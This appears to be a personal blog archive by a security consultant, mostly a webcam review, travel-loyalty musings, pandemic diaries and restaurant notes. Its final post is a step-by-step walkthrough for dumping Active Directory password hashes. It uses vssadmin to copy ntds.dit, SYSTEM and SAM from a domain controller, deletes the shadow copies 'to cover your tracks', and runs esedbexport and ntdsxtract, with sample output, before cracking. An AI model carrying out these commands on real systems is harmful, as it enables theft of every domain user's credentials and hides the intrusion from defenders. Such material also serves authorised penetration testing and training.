Amcrest – AWC201-B – 1080P WebCam Review

Amcrest reached out to me to test and review their AWC201-B Webcam.

This post contains references to products from one or more of our advertisers. We may receive compensation when you click on links to those products.

Arrived in a super small package, and inside was the camera and a security cover.

TESTING

Plugged the device into a Dell Latitude E7470 running Windows 10 and it was immediately recognized and the drivers were installed.

Tested the webcam on several different platforms to see how the device would work with each one.

  • Microsoft Teams
  • Slack
  • GoToMeeting
  • Zoom

Picture

Overall picture quality is good, there is a fishbowl look at the outer edge of the frame and image looks a little distorted. Color is a little dull looking as well, but if you have good lighting that can be compensated some. Below is how the edge is distorted on the image when shown, it is not super bad and depending on the actual background it is not always visible in the video.

Sound

Microphone on the camera is as expected and anyone who would expect good sound quality from something sitting that far away from you and that small has to be crazy. The sound quality is about what you would expect from something directly sitting on your laptop. It was a little better then what I have in laptop but overall it made me sound as if I was talking into a tin can and sitting super far away from the microphone.

PROS:

The price is very good compared to several other brands and the overall quality is good for most business meetings and personal usage to make video calls.

CONS:

Camera needs to have a swivel to allow for adjusting the angle of the camera left to right when sitting on top of a laptop. There are some video quality issues but not a show stopper depending on your need.

Outcome

Overall it is a good product for the price, and compared to some well know brands it works decent enough. Plus as of this writing (2020 Pandemic) they have product in stock as companies like Logitech it is near impossible to find any of their products in stock. If you are looking for a decent low priced camera and are not super worried about the overall picture quality this is the webcam for you.

Who is Ready to Travel Again?

I miss traveling, the fun of going new places, seeing new sights, and eating at new restaurants. I get to travel frequently for work, which has it upsides and downsides at times. I am gone a lot, but many times I do get to visit places i like to see and places I have never been before. As well as the perks you can get when your a frequent traveler with some airlines and hotels.

white airplane
Photo by Soumya Ranjan on Pexels.com

I not sure I want to get on a plane right now due to the current pandemic situations, but I sure do miss the excitement of visiting places. I miss staying at new hotels with different amenities to enjoy, as well as scouting out new places to eat.

I prefer to fly Delta as I have Diamond status with them at this current time and they have always treated me well so far. I do fly AA and United when I have to, as Delta does not always go where I need to travel. I used to be a United person but really began to have issues with them several years back and switched up to Delta, and have not had any major issues since in my travels (besides weather related issues). As for AA, they are not that great out of Knoxville Airport (TYS), not sure if it was from the merger with US Airways a few years back or what, but they seem to have the most delays and cancellations from TYS (In my opinion). I always see them on the status boards with Delayed or Canceled, I am sure some of it is due to TYS being a hub for most airlines, but AA seems to have issues very frequently there.

I also prefer to stay at Hilton Hotels, Marriott Hotels and when possible Hyatt Hotels. I have been loyal to Hilton for several years now, but more and more I am staying with Marriott. I made Lifetime Silver with Marriott and am super close to Lifetime Gold (60 Nights needed). HiltonMarriottHyatt

With Hilton I have several more years (5 years to go) to make Lifetime Diamond as they did not count a couple of years I was Diamond with them before they began the program and getting to 1000 nights will take a few more years. I am over halfway there, but when they do not have decent places to stay or they are too expensive to stay at in some areas, I will pick another brand. With Marriott they have a tier system so you can get to a specific status level sooner. I made their Silver Status late last year, and had been slowly working my way up to Gold Status early this year. However, with not traveling as much lately it has slowed my progress a lot.

For car rental companies I am switching it up to who ever gives me the best options. Have been using Hertz lately as I could do grab and go option similar to National.

HertzNationalAvis

However, with National it seems unless you have their higher tier status you do not get the nicer cars to drive as often lately. That was not the case when I first started using National, but had begin to change over time. It is not a big issue most of the time, but I do prefer to get something that is comfortable to drive and not a piece of crap. I do like how Hertz has gone to using Clear (when it really works), I noticed it goes a little quicker at the gates to check out when it works.

So all in all with the pandemic I might be changing up some of my travel preferences. I have got the Amex Platinum and Amex Gold cards, and will be looking to downgrade the Amex Delta Reserve card to the free Amex Delta Blue card. As I might be changing up my flying strategy with one airline due to lack of travel and ability to keep status. I am also looking to get the Chase Hyatt card to help with keep my Discoverist Status with them, as I might not get to stay at they properties much next year. I already have the Amex Hilton Aspire card and Chase Marriott Bonvoy card to help with earning points during my stays at their properties.

Planning to leverage the Amex Platinum card for booking flights and my Amex Gold card for dinning out and groceries, and my specific hotel branded cards for hotel stays. The Amex Platinum gets me Delta Lounge access when flying with Delta, as well Centurion and Priority Pass lounges where available when flying other carriers. With the Amex points I can transfer to partners to book flights with points and am not tied to one specific airline. I will miss the status from Delta, but not sure I will be getting much past Gold status after next year unless things pick up and we start traveling a lot more. We will see how that goes for 2021, and may switch back to some previous strategies in 2022 if the travel gets back to normal.

Pandemic Updates – June 2020

Well still dealing with the pandemic, and hanging around the house.

Not much has changed for me, still working form home, and having virtual meetings. At least many people I work with have decided to stop using their web cams for every meeting. Well, except the people in my company, they seem to still want you to see them all the time.

Going to the grocery store wearing a mask, and following the directional signage like I was asked to do. Surprising to see how many people cannot follow simple instructions, or are just being asses. It is not that it is that hard to follow simple things, as going one way on isles, and trying to stay a certain distance from people.

Now we are having protests, riots and looting in a lot of cities, due to a police officer(s) that killed a black/African American gentleman named George Floyd. It is interesting the way this has taken off and the amount of people that are involved in some of the protests, and discussions surrounding the police and brutality against people. However, I think some are just trying to get a few minutes of attention and are not entirely involved with the intent of the protests. There also seem to be some that are using it for other purposes, and to try to cause havoc, those are the ones who are looting stores and damaging property. It is bad when I hear more on the riots and looting in the news, and less about the actual protests and information on the case against the police officer(s).

Now there seems to be more cases of RONA happening lately, most seem to be from the memorial day holiday weekend and people wanting to get out of the house for some fun and enjoyment. Now we might see a larger increase from the protests, and I hope we don’t go backwards on the stay at home orders. Things were just starting to open back up and people were starting to be allowed to get haircuts, eat at an actual restaurant, and get out to the parks and other places.

The Stock markets cannot decide what it wants to do and the US feds are not helping much. People are demanding a second stimulus check, some people don’t want to go back to work as they are making more on unemployment then what they were getting paid. Stocks rose when they announced that unemployment was lower then expected for May. Then it started crashing again after a non-informative a briefing from the US Feds.

All I can say is stay safe, stay healthy, and look out for yourself and family. Do what feels right for you and your family, if you can stay home, then do that. If you have to go to an office to work, stay away from the crazies who think nothing is going on, and it is all a hoax.

Pandemic Updates – Staying at home for the greater Good!

So, we are still hanging out at home due to the COVID-19 Pandemic. Things have changed only a little for me during this time, I am still working jsut now at home more often. I was used to traveling to clients sites almost every other week, and now I am doing everything remotely for the most part.

Having meetings via Teams, Webex, and even Zoom has been interesting, especially with all the people who are not used to working remotely. With people demanding everyone use their webcams in meetings we get to see some interesting things, like people’s homes, their family members, and even their pets. This was not a normal thing that would happen several weeks ago on a virtual meeting. Several of the platforms are now allowing for virtual backgrounds, which gives people something to show other than their homes (messy or not).

https://thebasispoint.com/wp-content/uploads/2019/09/Conference_Call_Bullshit_Bingo_The_Basis_Point_via_INAGFATT.png

Been reading some articles from several people (not sure what makes them an expert on this subject) twitter and news articles who want to tell me how to work from home and how I should act in my virtual meetings. I think that giving people a list of things that work well for you in your remote job is stupid, as not everyone is the same or wants to do the same things as you. I have no problems with listing out things to try, and let the person decided what works best for them, but stop telling people how to work remotely. Also, telling people to not mute their microphones during meetings so they can have better interactions with their team is ridiculous as no one would ever get anything accomplished. All you would probably hear is people breathing, eating, typing and other background noises. Making the meeting useless and take for ever to get to what the meeting was intended to cover. People will figure out the flow, just let them work on it, as every meeting has a different focus and drive based on the purpose. Plus half of the people are chatting with each other in the background about most of the topics being discussed.

https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse1.mm.bing.net%2Fth%3Fid%3DOIP.gwjDbIQG4YCrKF37YKlVcQHaE8%26pid%3DApi&f=1
That cozy work environment we all love

Not everyone is geared to do remote work, and many people like to have that little interaction with an actual person in their work day. Some may even take a little more time to find their groove in this process and it will be a trial for several weeks to get it to their grove. Some people need a routine to get through their day, while others will just wing it everyday. Which scenario works for you just keep dealing with it and keep at it. For the people who are like “see now they (their employer) have no reason to not let us work remote going forward”, you may have to keep dreaming, as it is not that easy for every company to make that an easy decision. Be happy you have an option to work remote, not everyone has that as an option.

We have the people who were terminated or furloughed as the business could not continue making payroll. Then there are the people who are currently identified as essential (Medical staff, grocery store staff and food service staff) and then there is everyone else either working remote or sitting idle collecting some paycheck (either a full or partial payment) waiting for things to start moving again.

What is normal?

Will everything go back to normal? Well you need to define what normal is to start that discussion. I do not believe everything will go back to the way it was before the pandemic, I do see some changes that will last for several years if not permanent. People may get to work remote for some time before getting asked to come back into the office. I do not see that everyone will be required to come back all at once, it will be the people who want to or are able to come into the office to work. Some may not want to come back at first but want the comfort of working at the office with their colleagues. Others will stay remote for as long as they are allowed to, some may be told to come back to the office, while others may be allowed to make that a choice to stay a remote worker. Some peoples positions will be eliminated as there will not be a need for them due to less work overall, less money coming in to support the staff, and possibly the business not getting back to pre-pandemic operations.

https://images.mentalfloss.com/sites/default/files/styles/mf_image_16x9/public/iStock-650322650.jpg?itok=2v8kItYk&resize=1100x1100
Wishing to be heading somewhere nice

Traveling will take a while to get back to any type of normalcy and some airlines may not continue with or may limit some flights to certain cities (less profitable locations). Business travel will change for many, as it will not be justified to fly out to do those meetings onsite. Sales people may not be able to get into meet the people they are trying to sell products to. For many if it can be done remote, then that would be the preferred option, instead of the expense of traveling and the possibility of someone getting sick.

Vacation travel may take a big hit, some will be due to fear of traveling again, and some will be due to financial limitations from layoffs and people having less money. People may just do more driving to nearby areas that are less crowded, and less people flying on crowded planes to large populated areas. Cruising may have some less crowded ships, but not sure if that will be just older people and some families with kids, or if it will be across the board for people. Have read that cruise lines have seen an uptick in people booking trips for 2021, but I think it is people playing the game, and are hoping for a cancellation to get an extra credit fees to book a future trip or are taking the current credits they got for canceled trips to hold their place on the next ship.

Who know what the future will bring, I guess we will find out in the next coming months. One thing I can say is I hope people stop being stupid about this whole situation. Yes it sucks, and maybe could have been handled a lot better by the people in government. But if we all work together we will get through this sooner than later.

New work uniforms if we are not careful

Quarantined during the Pandemic

Well we have a full blown pandemic across the world due to the Novel Coronavirus (COVID-19), which the first cases of this virus started in December of 2019 in Wuhan, Hubei, China. The World Health Organization declared it a pandemic on March 11, 2020.

People are being forced to self quarantine as employers are going to a work from home model due to pressures to distance people from each other. Many people are happy that they actually get to work from home, while others are not overly ready or prepared to do work from home. It is funny to see all the twitter posts on how to work from home, and what you need to do. Some make sense and other s are just someones personal preferences. Figure out what works best for you, and try different things at first until it works best for you.

My Work From home:

  • Set a schedule (Wake up the same time every day)
  • Get ready for the day (Get out of your PJ’s and take a shower)
  • Have a separate place to work (My Desk is in my bedroom at the current time)
  • Dedicated work area (My standup desk in a corner of my bedroom)
  • Quite area for conference calls (No pets, kids, or TV’s)
  • Take breaks (Get away from things – walk outside, step away for 10 to 15 minutes)
  • Plan lunch breaks (Meet people, just get out of the house, actually take a break)
  • Have an end of the day (when does the work day end for you?)

Working from home is not for everyone, no matter what I hear on Twitter. Yes it sounds great for many people to be allowed to work from their house and not to have to drive into an office. While it sounds great to just roll out of bed and be at work, that is not always the case. For those that have kids at home and no real office to separate your self away from everyone else, it is hard to not get distracted. if you do not have a headset with noise canceling microphone, the background noise will be heard by everyone and very distracting. Telling yourself you can multi-task, just stop lying to your self. You are just doing more than one thing half paying attention to one or both of them most of the time.

See the source image

If it was not for me traveling frequently, working form home would get really boring and monotonous. I like to interact with people, not that I do not like to talk to my wife and kids, but they do not know anything about what I do for work or any of my hobbies. For some people who like to be alone and only want to see their family, that is good if you can work from home, but this is not for everyone.

See the source image

So, if your getting to work from home or looking to get a job that allows you to work from home. Make sure it will work for you, it is not for everyone all the time.

Some see perceived benefits:

  • No longer have a commute
    • Save on gas not commuting (maybe)
    • Save time not commuting (maybe)
  • Get to stay home with spouse/pets/kids
    • More quality time with family
    • Kids will not have to go to daycare/babysitter
  • Have more time (not sure on this one)
    • Able to take care of person things
    • Dr appointments when I want to go
    • Go to the store when I want
See the source image

If you get the opportunity to work from home get a plan to continue to show your value to your manager, otherwise you may have to go back to the office. This is the reason why many people do not get the opportunity to get to work from home is due to some slacker who could not handle it. Yes, your manager will believe you are not doing anything as they never see you. This could also impact promotions, as your not seen you tend to become invisible to people. Keep in contact with co-workers, your manager and show you can be productive no matter where you are.

Traveling to NC way to often.

Have been traveling to Mooresville, NC for work for about eleven months now (started in Feb 2019), it is getting a little tiring to visit the same place every week. I fly out on Monday and home on Friday almost every week. To me it is just far enough I do not want to drive the four+ hours one way, especially when I have meetings to go to as soon as I get in on Monday.
 
I have visited a large majority of restaurants in Mooresville, Davidson and surrounding areas, since I have been visiting the area. I was surprised to not be able to find a place to get fried chicken though, well except for the chain places.
 

Places in Mooresville NC:
I have tried several barbecue joints, and have been pleasantly surprised at the food. There is a place called Big Tiny’s that is a Texas style barbecue with some great banana pudding and Shiner Bock in bottles. Another place is called Lancaster’s which is an East North Carolina barbecue with plenty of NASCAR memorabilia all over the place, wings are good as well as the BBQ pork and a decent banana pudding as well.

Have tried Epic Chophouse, which I have visited several times and the food is always excellent. They have several menu items I have loved, one being the Smokin’ Hot Couple and the other is the Mixed Grill. Of course the steaks are great and they have a very good bar with many options on wines and beers. They are known for their deserts as well, which having tried a couple I can say they are great, have heard they are from a local bakery in town. This is my usual go to place when some one I know is coming onsite to visit and say lets do dinner.They require everyone to dress reasonably and men’s shirts must have sleeves. Almost every time I have been there it is packed but have not had an issue getting a table of finding a place in the bar area.

 

Places in Cornelius NC: 
131 Main, which I guess technically is a chain, but they only have four locations three in the Charlotte area and one in Asheville NC. Have only been once, but the food looks great, I tried the Southern Shrimp and Grits and had appetizers of Deviled Eggs and Cast Iron Cornbread. Everything was excellent and I was so stuffed I could not try dessert.

Places in Davidson NC:
Kindred is a great place to eat and is usually packed. Have been several time and have never had anything that was not excellent. The menu is seasonally driven and and is different everyday.
Flatiron Kitchen + Taproom, have been about six time here, and the food is always excellent, and the beer and wine selection is great.
Mesitzo is a Contemporary Mexican restaurant, it is fairly small but has a nice outdoor patio with a view of the downtown area.

Starting off 2017 right! (I hope…..)

Well its 2017 already, and I am not sure where 2016 went.

Last year I was extremely busy, traveling about every week and multiple ROC’s due weekly for my previous company. Never had enough time to actually do my job well or even think about fixing the issues that we had. Now that I am at Coalfire, I have plenty of time to do my job, with tons of resources to help me out. I am not traveling as much, which I sort of miss, hope that changes a little starting soon. Working from home is a little weird, not sure it is something I really like, miss the interactions with other people. Not that I do not like my family, its just getting out of the house for a little while and talking to other people with similar interests. Will be trying to get former colleagues to do lunch once in a while to at least try to keep up with whats going on.

This year is starting off fairly decent for me, since I am getting to attend two different training classes. First one is an ISO 27001 Lead Auditor certification course. I will be heading to Colorado for a few days. The class was supposed to be for junior associates that needed a certification to allow them to get their QSA. I asked if their was space I would like to attend, and I guess there was room for me. The second class is PCI P2PE certification, which will be a little harder from my perspective. Most of my cryptography experience is military related and not really geared towards the commercial sector. If I pass this course, I have been asked if I wanted to take the PA-DSS course and then possibly the PA-P2PE course. Since they are in need of people to assist in that area, I said why not. I am always willing to take training classes, certifications never hurt anyone.

So it looks like my first full ROC I am lead on will be a client that they have had for a while. This should be fairly nice to get to learn their methodology, and show my manager, I am able to do the work. I was brought in as a consultant, and not a senior consultant. That was something I had decided to do, I originally had interviewed for a senior security consultant position, but since they were willing to pay me the same for either position, I took the lower level position. I am sure some are going WTF, I would never do that. Well, I am more than capable to be a senior consultant, but If I come in as a junior level person and can show that I am very good at my job, I will more than likely get a promotion or possibly opportunities to do other stuff. Which is sort of what is happening already with the certification courses.

Well 2017, lets hope things keep rolling along smoothly…..   

Starting a new Job

I have Left Sword & Shield to take a better opportunity with Coalfire Systems.
There were multiple reasons for leaving Sword & Shield, and most of them are related to one individual that has moved up the ranks in the company. He was originally hired to do report reviews five years back, and is now the Senior VP of services. Since his move into management there has been a drastic exodus of highly qualified personnel from the company. One major issue is that the CEO/President, Executive VP and COO do not even notice the main reason for the high personnel turnover.
Since I turned in my notice, the CEO and COO have completely ignored me. Walking down the hallway, I always say hello to everyone, and usually get a hello back from whomever is there. Not lately; had multiple encounters with the C suite and they literally walk past me as if I was not there.
I wish all my former colleagues well in there endeavors and hope things get better.

Splitting my time between 2 bosses

So my move over to the PCI-QSA world has been extremely slow, primarily due to upper management. I have been currently splitting my time between doing penetration testing and QSA work. It has not been an easy process working for two bosses who have different scheduling styles. One gives me my schedule months out, and the other will send me an email days before he expects me to start working on a project. This does not always work well since the one boss does not usually look at my calendar to see if I will be available. So I get scheduled to do a penetration test when I will be onsite at a customers doing PCI work. Usually never works out in my favor, and makes for working long hours, with no compensation for it.
My bosses boss (our COO) said that on Jan 1 2016 I will move over to the PCI group but will still need to assist the penetration testing group with some projects. Not sure that is actually going to happen. The one thing that makes this a pain is they already hired a person to fill me on the team, but another person left in November leaving another shortage. The interesting thing is this same issue I am having with moving groups is the same reason I left the company the first time I worked there.
Only time will tell if I actually get to do my new job or if I am stuck being split between bosses.

Getting Hashes From NTDS.dit File – Updated Version

Moved from my old WordPress Blog:

Decided to update my original post on getting hashes from NTDS.dit file.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. I generally prefer to create a new copy, so I know it has the latest information.
Get ntds.dit and SYSTEM from Volume Shadow Copy on Host
Luckily Windows has built in tools to assist with collecting the files needed.
Vssadmin tool
List Volume Shadow Copies on the system:
C:vssadmin list shadows
Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.
Create a new Volume Shadow Copy of the current drive:
C:vssadmin create shadow /for=C:
Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

Pull files from the Volume Shadow copy: (EXAMPLES)
The volume shadow copy looks similar to the lines below:

\?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1
(there could be multiple copies, use the last one listed)

Registry Save

I also recommend getting a current copy of SYSTEM from the registry just in case.
Having had a couple times where the SYSTEM file from the shadow copy was corrupt.
reg SAVE HKLMSYSTEM c:SYS
Delete the shadows to cover your tracks:
vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
EXAMPLE:
vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
Now that you have the files, it is time to get the hashes
Utilities needed:
 • libesedb
• ntdsxtract
libesedb
Download libesedb: (Use which ever method you are comfortable with below)
Release Code:
https://github.com/libyal/libesedb/releases
(Download and unzip)
Compile Code:
https://github.com/libyal/libesedb
https://github.com/libyal/libesedb/wiki/Building
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make
esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source

source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
 Runing esedbexport to extract ntds.dit data:
./esedbexport -t <Directory to export data to> <ntds.dit file>

.export will be added to the end of the directory listed above

EXAMPLE:
# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.
(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract
git clone https://github.com/csababarta/ntdsxtract.git
Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.
options:
–sid <user sid>
List user identified by SID
–guid <user guid>
List user identified by GUID
–name <user name regexp>
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile <name of the LM hash output file>
–ntoutfile <name of the NT hash output file>
–pwdformat <format of the hash output>
ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the
output
–debug <name of the CSV output file>
Turn on detailed error messages and stack trace
Extracting user info:
python dsusers.py <datatable> <linktable> <work directory> [option]
(datatable and linktable are from the previously extracted files)
–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)
# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> –passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>
(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)
Example Output in JTR Format:
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP
--passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map' [+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::
(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
Now that you have what you need…. it is time to start cracking passwords to get to that data you wanted…